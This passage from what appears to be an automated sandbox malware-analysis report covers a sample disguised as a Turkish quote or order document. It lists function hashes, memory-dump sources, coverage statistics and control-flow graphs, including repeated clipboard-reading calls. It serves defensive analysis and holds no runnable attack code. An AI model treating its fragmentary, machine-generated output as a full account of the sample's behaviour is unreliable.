                                                                                        • Instruction Fuzzy Hash: C921F275605300DFDB14DF54D9C4B26BBB5EB84324F20C96DD84E4B286C33AD847CA62
                                                                                        Function 008FD3D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1517816998.00000000008FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_8fd000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                        • Instruction ID: abb3a79fea7edd2c590a1c733decc3f72b111a82fd27a81cc2c5cbacb4957f48
                                                                                        • Opcode Fuzzy Hash: 099256442a3ab3004f72329a4e4b6c70090b87d396c4978555b43c732be305a7
                                                                                        • Instruction Fuzzy Hash: F3110376504344CFCB05CF10D5C0B26BF72FBA4324F24C2A9DA094B656C33AE856CBA2
                                                                                        Function 0090D017 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1517947807.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_90d000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction ID: bbcc078f981f254e288ebc282d7bab997eebf1f4dbce4d1498cf9885f1a4b771
                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction Fuzzy Hash: 86118B75504280DFCB15CF54D5C4B15BBB2FB84324F24C6AAD8494B696C33AD84ACBA2
                                                                                        Function 0090D1CF Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1517947807.000000000090D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0090D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_90d000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction ID: 6fe5d3a8dbb709dccec73dd8c3432b0e9109c78b8ff78886c810c1ad7982cf6a
                                                                                        • Opcode Fuzzy Hash: 4ccb17c466d2e34b86bde66ac975e9cbefd8e24c09005379d072ef0b40a0d1c0
                                                                                        • Instruction Fuzzy Hash: 0611DD76505280DFDB05CF58C5C0B15FBB2FB84324F24C6ADD8494B696C33AD84ACB61

                                                                                        Non-executed Functions

                                                                                        Function 00CEE5A4 Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1518407389.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CE0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ce0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 74902f5b96eeca4c0cd9c9cad2910118d3c8d3502301e147b20bedf99f694c9d
                                                                                        • Instruction ID: 2ec322e5b4e49d54f1fde5c4fea1a3afa5ddf54cc84dc94f7f56f3d82809aec6
                                                                                        • Opcode Fuzzy Hash: 74902f5b96eeca4c0cd9c9cad2910118d3c8d3502301e147b20bedf99f694c9d
                                                                                        • Instruction Fuzzy Hash: 5CA16D32E002498FCF15DFB6C84059EB7B6FF99300B25457AE805AB265DB35EE56CB80

                                                                                        Execution Graph

                                                                                        Execution Coverage:12.3%
                                                                                        Dynamic/Decrypted Code Coverage:89.7%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:68
                                                                                        Total number of Limit Nodes:11
                                                                                        execution_graph 24971 6c4afd0 24972 6c4b035 24971->24972 24973 6c4b082 24972->24973 24975 6c49c24 24972->24975 24976 6c4bd20 DispatchMessageW 24975->24976 24977 6c4bd8c 24976->24977 24977->24972 24978 6c4a630 24979 6c4a658 24978->24979 24982 6c4a684 24978->24982 24980 6c4a661 24979->24980 24983 6c49b5c 24979->24983 24984 6c49b67 24983->24984 24985 6c4a97b 24984->24985 24987 6c49b78 24984->24987 24985->24982 24988 6c4a9b0 OleInitialize 24987->24988 24989 6c4aa14 24988->24989 24989->24985 24990 6c4bdb2 24991 6c4bdc4 24990->24991 24992 6c4bdcd 24990->24992 24995 129d01f 24991->24995 24999 129d010 24991->24999 24996 129d048 24995->24996 24997 129d066 24996->24997 25003 6c4c213 24996->25003 24997->24992 25001 129d01f 24999->25001 25000 129d066 25000->24992 25001->25000 25002 6c4c213 OleGetClipboard 25001->25002 25002->25001 25007 6c4c650 25003->25007 25013 6c4c643 25003->25013 25004 6c4c226 25004->24996 25009 6c4c658 25007->25009 25008 6c4c66c 25008->25004 25009->25008 25019 6c4c688 25009->25019 25030 6c4c698 25009->25030 25010 6c4c681 25010->25004 25014 6c4c650 25013->25014 25015 6c4c66c 25014->25015 25017 6c4c688 OleGetClipboard 25014->25017 25018 6c4c698 OleGetClipboard 25014->25018 25015->25004 25016 6c4c681 25016->25004 25017->25016 25018->25016 25020 6c4c698 25019->25020 25021 6c4c6c5 25020->25021 25023 6c4c709 25020->25023 25026 6c4c688 OleGetClipboard 25021->25026 25027 6c4c698 OleGetClipboard 25021->25027 25022 6c4c6cb 25022->25010 25025 6c4c789 25023->25025 25041 6c4c870 25023->25041 25045 6c4c863 25023->25045 25024 6c4c7a7 25024->25010 25025->25010 25026->25022 25027->25022 25031 6c4c6aa 25030->25031 25032 6c4c6c5 25031->25032 25034 6c4c709 25031->25034 25037 6c4c688 OleGetClipboard 25032->25037 25038 6c4c698 OleGetClipboard 25032->25038 25033 6c4c6cb 25033->25010 25036 6c4c789 25034->25036 25039 6c4c870 OleGetClipboard 25034->25039 25040 6c4c863 OleGetClipboard 25034->25040 25035 6c4c7a7 25035->25010 25036->25010 25037->25033 25038->25033 25039->25035 25040->25035 25043 6c4c885 25041->25043 25044 6c4c8ab 25043->25044 25049 6c4c41c 25043->25049 25044->25024 25047 6c4c870 25045->25047 25046 6c4c41c OleGetClipboard 25046->25047 25047->25046 25048 6c4c8ab 25047->25048 25048->25024 25050 6c4c918 OleGetClipboard 25049->25050 25052 6c4c9b2 25050->25052

                                                                                        Executed Functions

                                                                                        Function 012F6FC8 Relevance: 5.4, Strings: 4, Instructions: 448COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 155 12f6fc8-12f6ffe 287 12f7000 call 12f6fc8 155->287 288 12f7000 call 12f7118 155->288 289 12f7000 call 12f69a0 155->289 156 12f7006-12f700c 157 12f700e-12f7012 156->157 158 12f705c-12f7060 156->158 159 12f7014-12f7019 157->159 160 12f7021-12f7028 157->160 161 12f7077-12f708b 158->161 162 12f7062-12f7071 158->162 159->160 163 12f70fe-12f713b 160->163 164 12f702e-12f7035 160->164 167 12f7093-12f709a 161->167 284 12f708d call 12fa088 161->284 285 12f708d call 12fa0e8 161->285 286 12f708d call 12f9dd0 161->286 165 12f709d-12f70a7 162->165 166 12f7073-12f7075 162->166 176 12f713d-12f7143 163->176 177 12f7146-12f7166 163->177 164->158 170 12f7037-12f703b 164->170 168 12f70a9-12f70af 165->168 169 12f70b1-12f70b5 165->169 166->167 172 12f70bd-12f70f7 168->172 169->172 173 12f70b7 169->173 174 12f703d-12f7042 170->174 175 12f704a-12f7051 170->175 172->163 173->172 174->175 175->163 178 12f7057-12f705a 175->178 176->177 183 12f716d-12f7174 177->183 184 12f7168 177->184 178->167 187 12f7176-12f7181 183->187 186 12f74fc-12f7505 184->186 188 12f750d-12f7519 187->188 189 12f7187-12f719a 187->189 196 12f751b-12f7521 188->196 197 12f754a 188->197 194 12f719c-12f71aa 189->194 195 12f71b0-12f71cb 189->195 194->195 202 12f7484-12f748b 194->202 203 12f71ef-12f71f2 195->203 204 12f71cd-12f71d3 195->204 198 12f7523-12f7536 196->198 199 12f7552-12f755d 196->199 198->197 202->186 208 12f748d-12f748f 202->208 209 12f734c-12f7352 203->209 210 12f71f8-12f71fb 203->210 206 12f71dc-12f71df 204->206 207 12f71d5 204->207 212 12f7212-12f7218 206->212 213 12f71e1-12f71e4 206->213 207->206 207->209 211 12f743e-12f7441 207->211 207->212 214 12f749e-12f74a4 208->214 215 12f7491-12f7496 208->215 209->211 216 12f7358-12f735d 209->216 210->209 217 12f7201-12f7207 210->217 218 12f7508 211->218 219 12f7447-12f744d 211->219 220 12f721e-12f7220 212->220 221 12f721a-12f721c 212->221 222 12f727e-12f7284 213->222 223 12f71ea 213->223 214->188 224 12f74a6-12f74ab 214->224 215->214 216->211 217->209 225 12f720d 217->225 218->188 227 12f744f-12f7457 219->227 228 12f7472-12f7476 219->228 229 12f722a-12f7233 220->229 221->229 222->211 226 12f728a-12f7290 222->226 223->211 230 12f74ad-12f74b2 224->230 231 12f74f0-12f74f3 224->231 225->211 232 12f7296-12f7298 226->232 233 12f7292-12f7294 226->233 227->188 234 12f745d-12f746c 227->234 228->202 237 12f7478-12f747e 228->237 235 12f7246-12f726e 229->235 236 12f7235-12f7240 229->236 230->218 239 12f74b4 230->239 231->218 238 12f74f5-12f74fa 231->238 240 12f72a2-12f72b9 232->240 233->240 234->195 234->228 259 12f7274-12f7279 235->259 260 12f7362-12f7398 235->260 236->211 236->235 237->187 237->202 238->186 238->208 241 12f74bb-12f74c0 239->241 252 12f72bb-12f72d4 240->252 253 12f72e4-12f730b 240->253 242 12f74e2-12f74e4 241->242 243 12f74c2-12f74c4 241->243 242->218 250 12f74e6-12f74e9 242->250 247 12f74c6-12f74cb 243->247 248 12f74d3-12f74d9 243->248 247->248 248->188 251 12f74db-12f74e0 248->251 250->231 251->242 255 12f74b6-12f74b9 251->255 252->260 264 12f72da-12f72df 252->264 253->218 263 12f7311-12f7314 253->263 255->218 255->241 259->260 266 12f739a-12f739e 260->266 267 12f73a5-12f73ad 260->267 263->218 268 12f731a-12f7343 263->268 264->260 269 12f73bd-12f73c1 266->269 270 12f73a0-12f73a3 266->270 267->218 271 12f73b3-12f73b8 267->271 268->260 283 12f7345-12f734a 268->283 272 12f73c3-12f73c9 269->272 273 12f73e0-12f73e4 269->273 270->267 270->269 271->211 272->273 275 12f73cb-12f73d3 272->275 276 12f73ee-12f740d call 12f76f1 273->276 277 12f73e6-12f73ec 273->277 275->218 278 12f73d9-12f73de 275->278 280 12f7413-12f7417 276->280 277->276 277->280 278->211 280->211 281 12f7419-12f7435 280->281 281->211 283->260 284->167 285->167 286->167 287->156 288->156 289->156
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (oq$(oq$,q$,q
                                                                                        • API String ID: 0-620556200
                                                                                        • Opcode ID: 0e6f7277eee05c8c4bba35010a5d62729411dc704f6b90899f5852818d413338
                                                                                        • Instruction ID: e5379e8f364aea979cbe05f590a67f7d631b5b52c1681109974f56e28a895702
                                                                                        • Opcode Fuzzy Hash: 0e6f7277eee05c8c4bba35010a5d62729411dc704f6b90899f5852818d413338
                                                                                        • Instruction Fuzzy Hash: 70023A30A1021ADFDB15CF68D984AAEFBB6FF88300F198479EA05AB265D734DD45CB50
                                                                                        Function 012FA088 Relevance: 3.4, Strings: 2, Instructions: 900COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (oq$4'q
                                                                                        • API String ID: 0-1336004174
                                                                                        • Opcode ID: 78c8a8252d683d7832024b9b57dcaefd831407b8e4a317682ba2e876138a0a84
                                                                                        • Instruction ID: 639c578494527fc374cbf80d58e4949d45f3a07206ff273f71fe98a32d0ba1d2
                                                                                        • Opcode Fuzzy Hash: 78c8a8252d683d7832024b9b57dcaefd831407b8e4a317682ba2e876138a0a84
                                                                                        • Instruction Fuzzy Hash: 12826C34A1020ACFCB15CFA8C594AAEFBF6FF88310F158569E6099B365D730E945CB61
                                                                                        Function 012F69A0 Relevance: 3.0, Strings: 2, Instructions: 517COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (oq$Hq
                                                                                        • API String ID: 0-2917151738
                                                                                        • Opcode ID: 64a93d95903f1ad504bd5cb5a554d692f59d25d48895bf0471d25cb8a545d0ec
                                                                                        • Instruction ID: 7fbd1ac3e2e01f3350e0ecac06470c25ebb0cce014fcffd75da43645a17ccb47
                                                                                        • Opcode Fuzzy Hash: 64a93d95903f1ad504bd5cb5a554d692f59d25d48895bf0471d25cb8a545d0ec
                                                                                        • Instruction Fuzzy Hash: FF126E70A102199FDB19DF69C854BAEBBB6FF88300F14856DE606DB395DB309D42CB90
                                                                                        Function 012FC147 Relevance: 2.7, Strings: 2, Instructions: 235COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 887 12fc147-12fc158 888 12fc15a-12fc166 887->888 889 12fc184 887->889 892 12fc167-12fc16a 888->892 890 12fc186-12fc18a 889->890 893 12fc16b-12fc16c 892->893 894 12fc16f-12fc172 893->894 895 12fc17b-12fc17e 894->895 896 12fc174-12fc179 894->896 897 12fc18b-12fc199 895->897 898 12fc180-12fc182 895->898 896->890 897->892 900 12fc19b-12fc19d 897->900 898->888 898->889 900->893 901 12fc19f-12fc1a1 900->901 901->894 902 12fc1a3-12fc1c8 901->902 903 12fc1cf-12fc2ac call 12f41a0 call 12f3cc0 902->903 904 12fc1ca 902->904 914 12fc2ae 903->914 915 12fc2b3-12fc2d4 call 12f5658 903->915 904->903 914->915 917 12fc2d9-12fc2e4 915->917 918 12fc2eb-12fc2ef 917->918 919 12fc2e6 917->919 920 12fc2f4-12fc2fb 918->920 921 12fc2f1-12fc2f2 918->921 919->918 923 12fc2fd 920->923 924 12fc302-12fc310 920->924 922 12fc313-12fc357 921->922 928 12fc3bd-12fc3d4 922->928 923->924 924->922 930 12fc359-12fc36f 928->930 931 12fc3d6-12fc3fb 928->931 935 12fc399 930->935 936 12fc371-12fc37d 930->936 938 12fc3fd-12fc412 931->938 939 12fc413 931->939 937 12fc39f-12fc3bc 935->937 940 12fc37f-12fc385 936->940 941 12fc387-12fc38d 936->941 937->928 938->939 942 12fc397 940->942 941->942 942->937
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: d0af2a9ca4dac3a21fd337d44fc5b41933965a492d7f5a73287f9b8239f7a9f6
                                                                                        • Instruction ID: ac4394ec7bb725de52b38d0b92a50216b5b3b6078ec64cbcee71fe7f6ea9368e
                                                                                        • Opcode Fuzzy Hash: d0af2a9ca4dac3a21fd337d44fc5b41933965a492d7f5a73287f9b8239f7a9f6
                                                                                        • Instruction Fuzzy Hash: CDA10674E10258CFDB14DFAAD884A9EFBB2FF89300F14806AE509AB365DB709941CF50
                                                                                        Function 012F5362 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1026 12f5362-12f5364 1027 12f5366-12f53a0 1026->1027 1028 12f53c4-12f5484 call 12f41a0 call 12f3cc0 1026->1028 1029 12f53a7-12f53c2 1027->1029 1030 12f53a2 1027->1030 1040 12f548b-12f54a9 1028->1040 1041 12f5486 1028->1041 1029->1028 1030->1029 1071 12f54ac call 12f5649 1040->1071 1072 12f54ac call 12f5658 1040->1072 1041->1040 1042 12f54b2-12f54bd 1043 12f54bf 1042->1043 1044 12f54c4-12f54c8 1042->1044 1043->1044 1045 12f54cd-12f54d4 1044->1045 1046 12f54ca-12f54cb 1044->1046 1048 12f54db-12f54e9 1045->1048 1049 12f54d6 1045->1049 1047 12f54ec-12f5530 1046->1047 1053 12f5596-12f55ad 1047->1053 1048->1047 1049->1048 1055 12f55af-12f55d4 1053->1055 1056 12f5532-12f5548 1053->1056 1065 12f55ec 1055->1065 1066 12f55d6-12f55eb 1055->1066 1060 12f554a-12f5556 1056->1060 1061 12f5572 1056->1061 1062 12f5558-12f555e 1060->1062 1063 12f5560-12f5566 1060->1063 1064 12f5578-12f5595 1061->1064 1067 12f5570 1062->1067 1063->1067 1064->1053 1066->1065 1067->1064 1071->1042 1072->1042
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 59937260bacb7b93f217273e4bd543c92775899faa5e599f2168bb710f66d556
                                                                                        • Instruction ID: afe801e55b3a43d560a373d0ade0b69f395102fc59d92dcf0605c09cd86d664d
                                                                                        • Opcode Fuzzy Hash: 59937260bacb7b93f217273e4bd543c92775899faa5e599f2168bb710f66d556
                                                                                        • Instruction Fuzzy Hash: EE91B374E10258CFDB14DFAAD984A9DFBF2BF89300F14806AE909AB365DB309945CF50
                                                                                        Function 012FC468 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1073 12fc468-12fc498 1074 12fc49f-12fc57c call 12f41a0 call 12f3cc0 1073->1074 1075 12fc49a 1073->1075 1085 12fc57e 1074->1085 1086 12fc583-12fc5a4 call 12f5658 1074->1086 1075->1074 1085->1086 1088 12fc5a9-12fc5b4 1086->1088 1089 12fc5bb-12fc5bf 1088->1089 1090 12fc5b6 1088->1090 1091 12fc5c4-12fc5cb 1089->1091 1092 12fc5c1-12fc5c2 1089->1092 1090->1089 1093 12fc5cd 1091->1093 1094 12fc5d2-12fc5e0 1091->1094 1095 12fc5e3-12fc627 1092->1095 1093->1094 1094->1095 1099 12fc68d-12fc6a4 1095->1099 1101 12fc629-12fc63f 1099->1101 1102 12fc6a6-12fc6cb 1099->1102 1106 12fc669 1101->1106 1107 12fc641-12fc64d 1101->1107 1109 12fc6cd-12fc6e2 1102->1109 1110 12fc6e3 1102->1110 1108 12fc66f-12fc68c 1106->1108 1111 12fc64f-12fc655 1107->1111 1112 12fc657-12fc65d 1107->1112 1108->1099 1109->1110 1113 12fc667 1111->1113 1112->1113 1113->1108
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 4abfd2a5798d948388c5f435d8930e4cddfc9c58b812bb5cf52cb99f8970eabf
                                                                                        • Instruction ID: 224a626ef261a76e6c122ac147747b3a7e33dd81e9b2fd204aae02f17f59823d
                                                                                        • Opcode Fuzzy Hash: 4abfd2a5798d948388c5f435d8930e4cddfc9c58b812bb5cf52cb99f8970eabf
                                                                                        • Instruction Fuzzy Hash: 2A819374E14218CFEB14DFAAD984A9DFBF2BF88300F149069E519AB365DB709941CF50
                                                                                        Function 012FCCD8 Relevance: 2.7, Strings: 2, Instructions: 187COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1117 12fccd8-12fcd08 1118 12fcd0f-12fcdec call 12f41a0 call 12f3cc0 1117->1118 1119 12fcd0a 1117->1119 1129 12fcdee 1118->1129 1130 12fcdf3-12fce14 call 12f5658 1118->1130 1119->1118 1129->1130 1132 12fce19-12fce24 1130->1132 1133 12fce2b-12fce2f 1132->1133 1134 12fce26 1132->1134 1135 12fce34-12fce3b 1133->1135 1136 12fce31-12fce32 1133->1136 1134->1133 1138 12fce3d 1135->1138 1139 12fce42-12fce50 1135->1139 1137 12fce53-12fce97 1136->1137 1143 12fcefd-12fcf14 1137->1143 1138->1139 1139->1137 1145 12fce99-12fceaf 1143->1145 1146 12fcf16-12fcf3b 1143->1146 1150 12fced9 1145->1150 1151 12fceb1-12fcebd 1145->1151 1152 12fcf3d-12fcf52 1146->1152 1153 12fcf53 1146->1153 1156 12fcedf-12fcefc 1150->1156 1154 12fcebf-12fcec5 1151->1154 1155 12fcec7-12fcecd 1151->1155 1152->1153 1157 12fced7 1154->1157 1155->1157 1156->1143 1157->1156
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 16c8c233bd2a7ac89f1d65a1eafa906ad8fb7e7e26a5f01f5508fac4fb8c6c20
                                                                                        • Instruction ID: 5be8c725161249bab98a3c1b0401bbc5abae1f287e701f7f9180053a3c9b8a83
                                                                                        • Opcode Fuzzy Hash: 16c8c233bd2a7ac89f1d65a1eafa906ad8fb7e7e26a5f01f5508fac4fb8c6c20
                                                                                        • Instruction Fuzzy Hash: 1781A074E10218DFEB14DFAAD884A9DFBF2BF88300F148169E519AB365DB705945CF50
                                                                                        Function 012FD278 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1161 12fd278-12fd2a8 1162 12fd2af-12fd38c call 12f41a0 call 12f3cc0 1161->1162 1163 12fd2aa 1161->1163 1173 12fd38e 1162->1173 1174 12fd393-12fd3b4 call 12f5658 1162->1174 1163->1162 1173->1174 1176 12fd3b9-12fd3c4 1174->1176 1177 12fd3cb-12fd3cf 1176->1177 1178 12fd3c6 1176->1178 1179 12fd3d4-12fd3db 1177->1179 1180 12fd3d1-12fd3d2 1177->1180 1178->1177 1182 12fd3dd 1179->1182 1183 12fd3e2-12fd3f0 1179->1183 1181 12fd3f3-12fd437 1180->1181 1187 12fd49d-12fd4b4 1181->1187 1182->1183 1183->1181 1189 12fd439-12fd44f 1187->1189 1190 12fd4b6-12fd4db 1187->1190 1194 12fd479 1189->1194 1195 12fd451-12fd45d 1189->1195 1196 12fd4dd-12fd4f2 1190->1196 1197 12fd4f3 1190->1197 1200 12fd47f-12fd49c 1194->1200 1198 12fd45f-12fd465 1195->1198 1199 12fd467-12fd46d 1195->1199 1196->1197 1201 12fd477 1198->1201 1199->1201 1200->1187 1201->1200
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 9b760f7bc7e2e3826f71263f0591659513a0a61b8504e3d4f1210b3e0677a663
                                                                                        • Instruction ID: 399807a98a1c552e0f4be18298907b51a3efec7b9710bea2fe2822f7a7324baf
                                                                                        • Opcode Fuzzy Hash: 9b760f7bc7e2e3826f71263f0591659513a0a61b8504e3d4f1210b3e0677a663
                                                                                        • Instruction Fuzzy Hash: 3C81A174E10218CFEB14DFAAD884A9DFBF2BF88300F148069E919AB365DB709945CF50
                                                                                        Function 012FC738 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1205 12fc738-12fc768 1206 12fc76f-12fc84c call 12f41a0 call 12f3cc0 1205->1206 1207 12fc76a 1205->1207 1217 12fc84e 1206->1217 1218 12fc853-12fc874 call 12f5658 1206->1218 1207->1206 1217->1218 1220 12fc879-12fc884 1218->1220 1221 12fc88b-12fc88f 1220->1221 1222 12fc886 1220->1222 1223 12fc894-12fc89b 1221->1223 1224 12fc891-12fc892 1221->1224 1222->1221 1226 12fc89d 1223->1226 1227 12fc8a2-12fc8b0 1223->1227 1225 12fc8b3-12fc8f7 1224->1225 1231 12fc95d-12fc974 1225->1231 1226->1227 1227->1225 1233 12fc8f9-12fc90f 1231->1233 1234 12fc976-12fc99b 1231->1234 1238 12fc939 1233->1238 1239 12fc911-12fc91d 1233->1239 1240 12fc99d-12fc9b2 1234->1240 1241 12fc9b3 1234->1241 1244 12fc93f-12fc95c 1238->1244 1242 12fc91f-12fc925 1239->1242 1243 12fc927-12fc92d 1239->1243 1240->1241 1245 12fc937 1242->1245 1243->1245 1244->1231 1245->1244
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PHq$PHq
                                                                                        • API String ID: 0-1274609152
                                                                                        • Opcode ID: 94170347765de4411333a6574b5c8efc1fe29723587722f352abb6b0bcf53d79
                                                                                        • Instruction ID: ba9ecdbeaaa2d68758dae27119b0f23a9ffc145253a6ae68d3573b4fe4ac0e43
                                                                                        • Opcode Fuzzy Hash: 94170347765de4411333a6574b5c8efc1fe29723587722f352abb6b0bcf53d79
                                                                                        • Instruction Fuzzy Hash: BD81A174E10219CFEB14DFAAD984A9DFBF2BF88310F148069E919AB365DB709941CF50
                                                                                        Function 012FCA08 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
